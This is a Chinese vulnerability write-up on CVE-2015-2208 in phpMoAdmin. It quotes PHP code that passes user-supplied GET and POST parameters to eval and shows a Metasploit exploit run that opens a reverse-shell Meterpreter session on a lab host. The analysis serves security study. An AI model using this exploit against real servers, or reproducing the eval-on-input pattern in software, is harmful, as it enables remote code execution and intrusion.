原文:http://www.thinkings.org/2015/03/05/cve-2015-2208-phpmoadmin-exec-vul.html

phpMoAdmin 是一个用PHP 开发的在线MongoDB 管理工具,可用于创建、删除和修改数据库和索引,提供视图和数据搜索工具,提供数据库启动时间和内存的统计,支持JSON 格式数据的导入导出。

/phpmoadmin/moadmin.php 第555行

public function listRows($collection) {

    foreach ($this->sort as $key => $val) { //cast vals to int

        $sort[$key] = (int) $val;

}

$col = $this->mongo->selectCollection($collection);

$find = array();

if (isset($_GET['find']) && $_GET['find']) {

	$_GET['find'] = trim($_GET['find']);

	if (strpos($_GET['find'], 'array') === 0) {

		eval('$find = ' . $_GET['find'] . ';');

	} else if (is_string($_GET['find'])) {

		if ($findArr = json_decode($_GET['find'], true)) {

			$find = $findArr;

		}

	}

}

在这个listRows方法中,eval执行GET接收的find参数,首先$find变量初始化为数组,而且通过strpos判断传入的值是否为数组。看看哪里调用了这个方法。

/phpmoadmin/moadmin.php 第836行

if (isset($_GET['collection']) && $action != 'listCollections' && method_exists(self::$model, $action)) {

    $this->mongo[$action] = self::$model->$action($_GET['collection']);

    $this->mongo['count'] = self::$model->count;

    $this->mongo['colKeys'] = self::$model->colKeys;

}

首先需要设置collection,根据$action跟踪到第785行,这里就可以通过action接收listRows参数来调用listRows方法。

$action = (isset($_GET['action']) ? $_GET['action'] : 'listCollections');

整体触发漏洞的逻辑就是首先通过action接收listRows,调用这个方法后,eval就会执行$find传入的值。由于过滤不严,即可执行传入的任意恶意代码。

/phpmoadmin/moadmin.php 第693行

public function saveObject($collection, $obj) {

    eval('$obj=' . $obj . ';'); //cast from string to array

    return $this->mongo->selectCollection($collection)->save($obj);

}

saveObject函数中eval执行了形参$obj,找找哪里调用了这个函数。

/phpmoadmin/moadmin.php 第786行

if (isset($_POST['object'])) {

        if (self::$model->saveObject($_GET['collection'], $_POST['object'])) {

            return $this->_dumpFormVals();

        } else {

            $action = 'editObject';

            $_POST['errors']['object'] = 'Error: object could not be saved - check your array syntax.';

        }

}

开头检查POST是否传输了object,随后内包含的if进行判断,这个过程即调用了当前类的saveObject方法,POST传入object参数的值带入eval后就造成了代码执行。

Msf也已经更新了此漏洞的Exploit:

msf > use exploit/multi/http/phpmoadmin_exec

msf exploit(phpmoadmin_exec) > show options

Module options (exploit/multi/http/phpmoadmin_exec):

Name       Current Setting  Required  Description

----       ---------------  --------  -----------

Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]

RHOST                       yes       The target address

RPORT      80               yes       The target port

SSL        false            no        Negotiate SSL/TLS for outgoing connections

TARGETURI  /                yes       The URI path of the PHPMoAdmin page

VHOST                       no        HTTP server virtual host

Exploit target:

Id  Name

--  ----

0   PHPMoAdmin

msf exploit(phpmoadmin_exec) > set RHOST 172.16.20.136

RHOST => 172.16.20.136

msf exploit(phpmoadmin_exec) > set TARGETURI /phpmoadmin

TARGETURI => /phpmoadmin

msf exploit(phpmoadmin_exec) > exploit

[*] Started reverse TCP handler on 172.16.20.1:4444

[*] Executing payload...

[*] Sending stage (33684 bytes) to 172.16.20.136

[*] Meterpreter session 1 opened (172.16.20.1:4444 -> 172.16.20.136:33492) at 2015-03-05 22:34:56 +0800

meterpreter > ls

Listing: /php/www/phpmoadmin

=================================

Mode              Size    Type  Last modified              Name

----              ----    ----  -------------              ----

100644/rw-r--r--  31713   fil   2015-03-05 21:42:58 +0800  LICENSE

100644/rw-r--r--  5078    fil   2015-03-05 21:42:58 +0800  README.textile

100644/rw-r--r--  1858    fil   2015-03-05 21:42:58 +0800  change.log

100644/rw-r--r--  111430  fil   2015-03-05 21:42:58 +0800  moadmin.php

phpMoadmin CVE-2015-2208 远程代码执行漏洞分析的更多相关文章

  1. [转帖]Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626)

    Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626) ADLab2019-03-15共23605人围观 ,发现 4 个不明物体安全报告漏洞 https://www.f ...

  2. Spring框架的反序列化远程代码执行漏洞分析(转)

    欢迎和大家交流技术相关问题: 邮箱: jiangxinnju@163.com 博客园地址: http://www.cnblogs.com/jiangxinnju GitHub地址: https://g ...

  3. thinkphp5.0.22远程代码执行漏洞分析及复现

    虽然网上已经有几篇公开的漏洞分析文章,但都是针对5.1版本的,而且看起来都比较抽象:我没有深入分析5.1版本,但看了下网上分析5.1版本漏洞的文章,发现虽然POC都是一样的,但它们的漏洞触发原因是不同 ...

  4. CVE-2012-1876Microsoft Internet Explorer Col元素远程代码执行漏洞分析

    Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器.         Microsoft Internet Explorer 6至9版本中存在漏 ...

  5. CVE-2012-0003 Microsoft Windows Media Player ‘winmm.dll’ MIDI文件解析远程代码执行漏洞 分析

    [CNNVD]Microsoft Windows Media Player ‘winmm.dll’ MIDI文件解析远程代码执行漏洞(CNNVD-201201-110)    Microsoft Wi ...

  6. Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞分析和复现

    0x00 漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库.其3.14.0及之前版本中,存在一处基于OrientDB自 ...

  7. CVE-2018-7600 Drupal核心远程代码执行漏洞分析

    0x01 漏洞介绍 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用.两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CV ...

  8. CVE-2017-7269—IIS 6.0 WebDAV远程代码执行漏洞分析

    漏洞描述: 3月27日,在Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269),漏洞利用PoC开始流传,但糟糕的是这产品已经停止更新了.网上流传的poc ...

  9. Thinkphp5-0-X远程代码执行漏洞分析(2019-1-11)

    周五下午爆洞能不能让人们好好休个周末! 分析过程 本次漏洞关键位置:/thinkphp/library/think/Request.php,lines:501由图可以看到在method函数中引入了可控 ...

随机推荐

  1. 【WEB】web www http html hypermedia hypertext 技术名词的意思

    www WWW是环球信息网的缩写,(亦作"Web"."WWW"."'W3'",英文全称为"World Wide Web" ...

  2. js将多个方法添加到window对象上的多种方法

    方法一:(最简单也是最笨的方法) window.a = function(){}window.b = function(){}window.c = function(){} 方法二:(利用jq的ext ...

  3. iOS动画效果和实现

    动画效果提供了状态或页面转换时流畅的用户体验,在iOS系统中,咱们不需要自己编写绘制动画的代码,Core Animation提供了丰富的api来实现你需要的动画效果. UIKit只用UIView来展示 ...

  4. SQL SERVER中如何在声明游标的语句中,用变量做表名

    -- 因为定义游标所用的表名是变量,所以采用EXEC(定义语句) 的方式来声明游标set @StrSql='DECLARE Ba_Cursor CURSOR FOR (SELECT a.PhoneId ...

  5. java Clone 的心得记录

    我看有些类并没有实现Cloneable接口,这种情况下调用clone()方法也不try catch也不throws: 但是如果我自己这样搞,也不实现Cloneable,接口,直接调用clone()方法 ...

  6. 【leetcode】Generate Parentheses

    题目简述: Given n pairs of parentheses, write a function to generate all combinations of well-formed par ...

  7. 常用命令[Linux]

    Linux文件类型 -:普通文件(f) d:目录文件 b:块设备文件(block) c:字符设备文件(character) l:符号链接文件(symbolic link file) p:命名管道文件( ...

  8. 使用base.调用父类里面的属性

    使用base.调用父类里面的属性public class parent { public string a; }public class child :parent { public string g ...

  9. android应用程序第一次启动时显示引导界面

    市面上好多优秀的应用(举例新浪微博.UC浏览器)都采用了欢迎页面与使用向导的方式给用户带来了良好的用户体验. 一般来说用户第一次安装应用或者安装了新版本后第一次进入应用都会显示成 欢迎页面-使用向导- ...

  10. 老生长谈的$.extend()方法

    jq的extend()是jq插件扩展很重要的部分,到这里证明是可以自己在jq的基础上,分为两种方法去扩展或开发,为jq本身添加一个方法,可以理解成扩展静态方法和自定义方法. 今天有看到一篇帖子,对这部 ...